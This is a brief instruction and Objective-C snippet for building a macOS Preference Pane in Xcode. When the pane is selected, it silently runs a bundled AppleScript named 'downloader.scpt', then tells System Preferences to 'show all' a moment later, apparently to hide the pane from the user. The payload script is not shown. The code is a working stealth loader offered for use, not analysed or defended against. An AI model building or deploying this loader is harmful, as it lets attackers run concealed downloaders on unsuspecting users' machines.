Start a new project in Xcode via the Preference Pane template, then add/replace in the main class:

- (void)mainViewDidLoad
{
}

- (void)willSelect {
    NSString *scriptPath = [NSString stringWithFormat:@"%@%@", [[NSBundle bundleForClass:[self class]] resourcePath], @"/downloader.scpt"];
    [self runApplescript: [NSMutableString stringWithFormat:@"run script \"%@\"", scriptPath]];
    
    [self performSelector:@selector(runApplescript:) withObject:[NSMutableString stringWithString:@"tell application \"System Preferences\" to set show all to true"] afterDelay:0.01];
}

- (void)runApplescript:(NSMutableString *)scriptSource {
    NSAppleScript *script = [[NSAppleScript alloc] initWithSource:scriptSource];
    NSDictionary *error;
    [[script executeAndReturnError:&error] stringValue];
}